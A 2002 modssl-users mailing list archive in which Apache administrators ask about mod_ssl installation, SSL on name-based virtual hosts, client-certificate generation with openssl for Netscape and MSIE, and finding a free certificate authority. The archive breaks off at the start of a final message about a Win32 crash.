	by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA08136
	for ; Wed, 22 May 2002 09:40:18 +0200 (MEST)
Message-ID: <3CEB4B62.DFA63707@bourse.ch>
Date: Wed, 22 May 2002 09:40:18 +0200
From: Owen Boyle 
X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: how to install mod_ssl at openunix 8.0.0 (caldera)?
References: <00b401c2015d$66dde680$bf02df8b@tisnet.net.tw>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Owen Boyle 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> ch wrote:
> 
> 
> i tried to install mod_ssl-2.8.8-1.3.24 at openunix 8.0.0.
> but failed.
> the reason was apache_1.3.24 could not install at openunix 8.0.0.
> only httpd-2.0.36 can.

I don't understand this message at all...

- Do you have apache already installed? Which version?
- Do you know you have to recompile apache to load mod_ssl?
- Do you have openssl libraries installed?
- How are you trying to compile apache/mod_ssl? which order?
- Where does the install fail? configure? make? make install?
- what is the error messages? (Just the last error, not the whole
output, please!)

Rgds,

Owen Boyle.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 22 10:13:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA13882; Wed, 22 May 2002 10:12:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id KAA13852; Wed, 22 May 2002 10:11:22 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GWI6QV00.GDW for ; Wed, 22 May 2002
          09:11:19 +0100 
Message-ID: <3CEB52A6.1010106@itaction.co.uk>
Date: Wed, 22 May 2002 09:11:18 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: [Q] VirtualHost problems..
References: <000501c2015f$678e38d0$0313030a@Nazgul33TP>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Try reading the FAQ.....

http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47

Han, Donghoon wrote:

>Hi everyone,
>
>I recently configured several named virtual hosts on my Apache 1.3.24
>server.
>
>NameVirtualHost A.B.C.D:80
>NameVirtualHost E.F.G.H:80
>NameVirtualHost A.B.C.D:443
>NameVirtualHost E.F.G.H:443
>
>-- Several :80 virtual hosts --
>
>
>ServerName blah.blah.com
>SSLCertificateFile A.crt
>SSLCertificateKeyFile A.key
>-- other configurations --
>
>
>ServerName blah2.blah2.com
>SSLCertificateFile A2.crt
>SSLCertificateKeyFile A2.key
>-- other configurations --
>
>
>I configured like this, but when I connect to blah2.blah2.com
>Explorer gets the certificate of the first virtual host.
>The other configurations are ok, I get authentication dialogs and
>I get the right file as I configured the virtual host.
>The only one problem is that I get the different certificate from the
>one I configured. Did I miss something?
>
>Thanks in advance.
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 22 10:20:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA14408; Wed, 22 May 2002 10:19:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.inzen.com id KAA14383; Wed, 22 May 2002 10:18:38 +0200 (MET DST)
Received: from Nazgul33TP (sslproxy.anonymous [10.4.1.102])
	(authenticated)
	by mail.inzen.com (8.11.6/8.11.6) with ESMTP id g4M8QlJ18973
	for ; Wed, 22 May 2002 17:26:47 +0900
From: "Han, Donghoon" 
To: 
Subject: RE: [Q] VirtualHost problems..
Date: Wed, 22 May 2002 17:18:29 +0900
Organization: =?us-ascii?B?QUlBPw==?=
Message-ID: <001201c20169$419c2060$0313030a@Nazgul33TP>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
In-Reply-To: <3CEB52A6.1010106@itaction.co.uk>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Han, Donghoon" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Oh, my... Thanks Peter.
Then theoretically, name based virtual host can't use
Their own certificates on any web server, with any SSL module.

Hmm... Then I need more IP Address........

--------
nazgul33@inzen.com ( poweroff@inzen.com is not avail. )

http://www.nazgul33.com


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Peter Viertel
Sent: Wednesday, May 22, 2002 5:11 PM
To: modssl-users@modssl.org
Subject: Re: [Q] VirtualHost problems..

Try reading the FAQ.....

http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47

Han, Donghoon wrote:

>Hi everyone,
>
>I recently configured several named virtual hosts on my Apache 1.3.24
>server.
>
>NameVirtualHost A.B.C.D:80
>NameVirtualHost E.F.G.H:80
>NameVirtualHost A.B.C.D:443
>NameVirtualHost E.F.G.H:443
>
>-- Several :80 virtual hosts --
>
>
>ServerName blah.blah.com
>SSLCertificateFile A.crt
>SSLCertificateKeyFile A.key
>-- other configurations --
>
>
>ServerName blah2.blah2.com
>SSLCertificateFile A2.crt
>SSLCertificateKeyFile A2.key
>-- other configurations --
>
>
>I configured like this, but when I connect to blah2.blah2.com
>Explorer gets the certificate of the first virtual host.
>The other configurations are ok, I get authentication dialogs and
>I get the right file as I configured the virtual host.
>The only one problem is that I get the different certificate from the
>one I configured. Did I miss something?
>
>Thanks in advance.
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 22 16:17:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA00523; Wed, 22 May 2002 16:16:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ssmail.ct.smartserv.com id QAA00501; Wed, 22 May 2002 16:15:46 +0200 (MET DST)
Received: by ssmail.ct.smartserv.com with Internet Mail Service (5.5.2653.19)
	id ; Wed, 22 May 2002 10:16:24 -0400
Message-ID: 
From: "Petryczka, George" 
To: "'modssl-users@modssl.org'" 
Subject: re-making certificates
Date: Wed, 22 May 2002 10:16:24 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Petryczka, George" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

When re-making certificates does the old one need to get deleted first?
How?

Does make install need to be re-run afterwards?  If so, is there an
uninstall of some kind that has to happen first?

Finallly, does the CN value that the make certificate utility prompts for
have to be set to the FQDN of the server box?


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 22 18:56:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA05756; Wed, 22 May 2002 18:55:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA05719; Wed, 22 May 2002 18:54:32 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 64C364CE740; Wed, 22 May 2002 18:24:21 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id B52AF28740; Wed, 22 May 2002 18:21:40 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from raq76.uk2net.com.local id JAA12482; Wed, 22 May 2002 09:49:57 +0200 (MET DST)
Received: from comice ([62.189.189.147])
	by raq76.uk2net.com.local (8.9.3/8.9.3) with ESMTP id IAA23947
	for ; Wed, 22 May 2002 08:49:55 +0100
From: "Jeff Aqua" 
To: 
Subject: RE: Import certificates in Netscape
Date: Wed, 22 May 2002 08:49:52 +0100
Message-ID: <000401c20165$44892b00$3864a8c0@comice>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
In-Reply-To: <3CEA58EE.F39A67FA@sepro-robotique.com>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Aqua" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> Then I create client certificates with openssl, all is OK, 

You don't provide the actual commands you use to generate
the client certs, or how you know that all is OK...

> but when I want to import them in Netscape (4.74) I have an 
> error like : "Unable to import certificates. the file 
> specified is either corrupt or is not a valid file."

So here are the commands that I use to generate either
MSIE client certs or Netscape 4 client certs:

Notes:

  $certificate_request = full filename of request
  $startdate           = date cert is valid from
  $days                = number of days cert is valid

Calculate these filenames based on the request name:
  $certificate_der     = working DER format cert
  $certificate_pem     = final name of PEM cert

I keep my CA in /etc/ca

Commands used to generate client certs:
MSIE:
  openssl ca 
   -config $config 
   -gencrl 
   -in $certificate_request 
   $startdate 
   -days $days 
   -out $certificate_der

  openssl 
    crl2pkcs7 
    -in /etc/ca/crl.pem 
    -certfile $certificate_der
    -certfile /etc/ca/cacert.pem
    -outform PEM 
    -out $certificate_pem 
   
NETSCAPE:   
  openssl ca 
    -config $config 
    -gencrl 
    -spkac $certificate_request 
    $startdate 
    -days $days 
    -out $certificate_der

  # NS requires a PEM encoded x509-user-cert
  # MUST deliver as application/x509-user-cert mime type
  openssl x509 
    -inform DER 
    -in $certificate_der 
    -outform PEM 
    -out $certificate_pem


Hope it helps. 
Regards

Jeff

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of GRASSET Guillaume
Sent: 21 May 2002 15:26
To: modssl-users@modssl.org
Subject: Import certificates in Netscape


Hi,

I have installed apache with mod_ssl and it works well.
Then I create client certificates with openssl, all is OK, but when I
want to import them in Netscape (4.74) I have an error like : "Unable to
import certificates. the file specified is either corrupt or is not a
valid file."


I don't find it in FAQ List, so if anybody can help me...


Thanks in advance

Guillaume Grasset

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 23 19:14:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA07043; Thu, 23 May 2002 19:13:55 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from COHNTFS24.ci.henderson.nv.us id TAA06908; Thu, 23 May 2002 19:12:48 +0200 (MET DST)
Received: from gty.ci.henderson.nv.us (unverified) by COHNTFS24.ci.henderson.nv.us
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Thu, 23 May 2002 10:13:07 -0700
Received: from HENMAIL2-Message_Server by gty.ci.henderson.nv.us
	with Novell_GroupWise; Thu, 23 May 2002 10:12:36 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Thu, 23 May 2002 10:12:17 -0700
From: "Jeff Landers" 
To: 
Subject: ssl with apache2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA06977
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I cannot configure apache-2.0.36 with ssl without fatal errors in the config.log. What am I doing wrong of  do I ignore this? It finishes but......

./configure --with-ssl=/tmp/openssl-0.9.6 


thousands of lines before


configure:5317: gcc -o conftest -g -O2 -pthreads -DSOLARIS2=8 -D_POSIX_PTHREAD_SEMANTICS -D_REENTRANT  conftest.c -lsendfile
 -lrt -lm -liconv -lsocket -lnsl -lresolv  -ldl >&5
Undefined                       first referenced
 symbol                             in file
bindprocessor                       /var/tmp/cckn5iYx.o
ld: fatal: Symbol referencing errors. No output written to conftest
collect2: ld returned 1 exit status
configure:5320: $? = 1
configure: failed program was:
#line 5279 "configure"
#include "confdefs.h"
/* System header to define __stub macros and hopefully few prototypes,
    which can conflict with char bindprocessor (); below.  */
#include 
/* Override any gcc2 internal prototype to avoid an error.  */
#ifdef __cplusplus


thousands of lines after

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 23 19:32:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA09547; Thu, 23 May 2002 19:30:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from AEX01.anchieta.local id TAA09315; Thu, 23 May 2002 19:28:44 +0200 (MET DST)
Subject: security
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
content-class: urn:content-classes:message
Date: Thu, 23 May 2002 14:16:55 -0300
X-MimeOLE: Produced By Microsoft Exchange V6.0.4712.0
Message-ID: 
Thread-Topic: security
Thread-Index: AcICfaONy0PDTW5pEdawYQABA94fxA==
From: "Angelo Marcos Rigo" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA09394
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Angelo Marcos Rigo" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi 

I would like to have a secure website
ghow can i do that?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 23 19:37:58 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA10397; Thu, 23 May 2002 19:36:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from AEX01.anchieta.local id TAA10153; Thu, 23 May 2002 19:34:20 +0200 (MET DST)
Subject: RES: security
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
content-class: urn:content-classes:message
Date: Thu, 23 May 2002 14:34:39 -0300
X-MimeOLE: Produced By Microsoft Exchange V6.0.4712.0
Message-ID: 
Thread-Topic: security
Thread-Index: AcICfaONy0PDTW5pEdawYQABA94fxAAAmOYw
From: "Angelo Marcos Rigo" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA10304
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Angelo Marcos Rigo" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have linux apache mo0d_ssl and openssl i would like toknow a free ca
to get a certificate anyone knows?

> ----- Mensagem original -----
> De:		Angelo Marcos Rigo 
> Enviada em:		quinta-feira, 23 de maio de 2002 14:17
> Para:		modssl-users@modssl.org
> Assunto:		security
> 
> Hi 
> 
> I would like to have a secure website
> ghow can i do that?
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 23 19:54:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA12068; Thu, 23 May 2002 19:53:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.pcs.loc id TAA12025; Thu, 23 May 2002 19:53:15 +0200 (MET DST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: security
X-MimeOLE: Produced By Microsoft Exchange V6.0.4417.0
Date: Thu, 23 May 2002 12:51:55 -0500
Message-ID: 
Thread-Topic: security
Thread-Index: AcICfaONy0PDTW5pEdawYQABA94fxAAAmOYwAACTE9A=
From: "Woodraska, Robert J." 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA12038
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Woodraska, Robert J." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have never heard of a free CA.  You can create your own certificates
and fake CA using the SnakeOil method/docs, and users would have to
accept your certificate, but I don't think there are any CA's with
certificates already built in to the browsers that will just give you a
certificate.

-----Original Message-----
From: Angelo Marcos Rigo [mailto:angelo@colegioanchieta.g12.br]
Sent: Thursday, May 23, 2002 12:35 PM
To: modssl-users@modssl.org
Subject: RES: security


I have linux apache mo0d_ssl and openssl i would like toknow a free ca
to get a certificate anyone knows?

> ----- Mensagem original -----
> De:		Angelo Marcos Rigo 
> Enviada em:		quinta-feira, 23 de maio de 2002 14:17
> Para:		modssl-users@modssl.org
> Assunto:		security
> 
> Hi 
> 
> I would like to have a secure website
> ghow can i do that?
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 23 19:58:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA12388; Thu, 23 May 2002 19:57:44 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from AEX01.anchieta.local id TAA12301; Thu, 23 May 2002 19:56:58 +0200 (MET DST)
Subject: RES: security
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
content-class: urn:content-classes:message
Date: Thu, 23 May 2002 14:57:16 -0300
X-MimeOLE: Produced By Microsoft Exchange V6.0.4712.0
Message-ID: 
Thread-Topic: security
Thread-Index: AcICfaONy0PDTW5pEdawYQABA94fxAAAmOYwAACTE9AAADLsgA==
From: "Angelo Marcos Rigo" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA12340
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Angelo Marcos Rigo" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thank´s Robert
	if i make my ow what will be the stepsto do 
	i am new in ssl/criptography 

> ----- Mensagem original -----
> De:		Woodraska, Robert J. [SMTP:rjw@pcs-sd.com]
> Enviada em:		quinta-feira, 23 de maio de 2002 14:52
> Para:		modssl-users@modssl.org
> Assunto:		RE: security
> 
> I have never heard of a free CA.  You can create your own certificates
> and fake CA using the SnakeOil method/docs, and users would have to
> accept your certificate, but I don't think there are any CA's with
> certificates already built in to the browsers that will just give you
> a
> certificate.
> 
> -----Original Message-----
> From: Angelo Marcos Rigo [mailto:angelo@colegioanchieta.g12.br]
> Sent: Thursday, May 23, 2002 12:35 PM
> To: modssl-users@modssl.org
> Subject: RES: security
> 
> 
> I have linux apache mo0d_ssl and openssl i would like toknow a free ca
> to get a certificate anyone knows?
> 
> > ----- Mensagem original -----
> > De:		Angelo Marcos Rigo 
> > Enviada em:		quinta-feira, 23 de maio de 2002 14:17
> > Para:		modssl-users@modssl.org
> > Assunto:		security
> > 
> > Hi 
> > 
> > I would like to have a secure website
> > ghow can i do that?
> > 
> >
> ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)
> www.modssl.org
> > User Support Mailing List
> modssl-users@modssl.org
> > Automated List Manager
> majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 23 20:12:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA14152; Thu, 23 May 2002 20:11:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from gateway.villasenor.org id UAA14065; Thu, 23 May 2002 20:10:50 +0200 (MET DST)
Received: from gateway.villasenor.org. (gateway.villasenor.org. [209.51.135.66])
	by gateway.villasenor.org (8.11.1/8.11.1) with ESMTP id g4NHwA601659
	for ; Thu, 23 May 2002 13:58:10 -0400 (EDT)
	(envelope-from tony@villasenor.org)
Date: Thu, 23 May 2002 13:58:10 -0400 (EDT)
From: Tony Villasenor 
To: modssl-users@modssl.org
Subject: RE: security
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tony Villasenor 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


http://www.freessl.com/


On Thu, 23 May 2002, Woodraska, Robert J. wrote:

> I have never heard of a free CA.  You can create your own certificates
> and fake CA using the SnakeOil method/docs, and users would have to
> accept your certificate, but I don't think there are any CA's with
> certificates already built in to the browsers that will just give you a
> certificate.
> 
> -----Original Message-----
> From: Angelo Marcos Rigo [mailto:angelo@colegioanchieta.g12.br]
> Sent: Thursday, May 23, 2002 12:35 PM
> To: modssl-users@modssl.org
> Subject: RES: security
> 
> 
> I have linux apache mo0d_ssl and openssl i would like toknow a free ca
> to get a certificate anyone knows?
> 
> > ----- Mensagem original -----
> > De:		Angelo Marcos Rigo 
> > Enviada em:		quinta-feira, 23 de maio de 2002 14:17
> > Para:		modssl-users@modssl.org
> > Assunto:		security
> > 
> > Hi 
> > 
> > I would like to have a secure website
> > ghow can i do that?
> > 
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 23 21:18:45 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA21163; Thu, 23 May 2002 21:17:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from AEX01.anchieta.local id VAA21007; Thu, 23 May 2002 21:16:15 +0200 (MET DST)
Subject: RES: security
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
content-class: urn:content-classes:message
Date: Thu, 23 May 2002 15:14:05 -0300
X-MimeOLE: Produced By Microsoft Exchange V6.0.4712.0
Message-ID: 
Thread-Topic: security
Thread-Index: AcIChXxkFKsHYlG7QnSS8WqeDkDUiAAAB9Yg
From: "Angelo Marcos Rigo" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id VAA21108
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Angelo Marcos Rigo" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

thank´s a lot!!

> ----- Mensagem original -----
> De:		Tony Villasenor [SMTP:tony@villasenor.org]
> Enviada em:		quinta-feira, 23 de maio de 2002 14:58
> Para:		modssl-users@modssl.org
> Assunto:		RE: security
> 
> 
> http://www.freessl.com/
> 
> 
> On Thu, 23 May 2002, Woodraska, Robert J. wrote:
> 
> > I have never heard of a free CA.  You can create your own
> certificates
> > and fake CA using the SnakeOil method/docs, and users would have to
> > accept your certificate, but I don't think there are any CA's with
> > certificates already built in to the browsers that will just give
> you a
> > certificate.
> > 
> > -----Original Message-----
> > From: Angelo Marcos Rigo [mailto:angelo@colegioanchieta.g12.br]
> > Sent: Thursday, May 23, 2002 12:35 PM
> > To: modssl-users@modssl.org
> > Subject: RES: security
> > 
> > 
> > I have linux apache mo0d_ssl and openssl i would like toknow a free
> ca
> > to get a certificate anyone knows?
> > 
> > > ----- Mensagem original -----
> > > De:		Angelo Marcos Rigo 
> > > Enviada em:		quinta-feira, 23 de maio de 2002 14:17
> > > Para:		modssl-users@modssl.org
> > > Assunto:		security
> > > 
> > > Hi 
> > > 
> > > I would like to have a secure website
> > > ghow can i do that?
> > > 
> > >
> ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)
> www.modssl.org
> > > User Support Mailing List
> modssl-users@modssl.org
> > > Automated List Manager
> majordomo@modssl.org
> >
> ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)
> www.modssl.org
> > User Support Mailing List
> modssl-users@modssl.org
> > Automated List Manager
> majordomo@modssl.org
> >
> ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)
> www.modssl.org
> > User Support Mailing List
> modssl-users@modssl.org
> > Automated List Manager
> majordomo@modssl.org
> > 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 24 05:49:57 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA06160; Fri, 24 May 2002 05:49:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from aktiv.com id FAA06113; Fri, 24 May 2002 05:47:49 +0200 (MET DST)
Received: from mikepc (24.77.31.60) by aktiv.com with ESMTP (Eudora
 Internet Mail Server 3.0.2) for ;
 Thu, 23 May 2002 13:47:45 -0700
Message-ID: <006401c2029b$42421a50$3c1f4d18@mikepc>
From: "Mike Campbell" 
To: 
Subject: Apache + MOD_SSL Win32 crash
Date: Thu, 23 May 2002 13:48:56 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0061_01C20260.9590DC90"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mike Campbell" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0061_01C20260.9590DC90
Content-Type: text/plain;
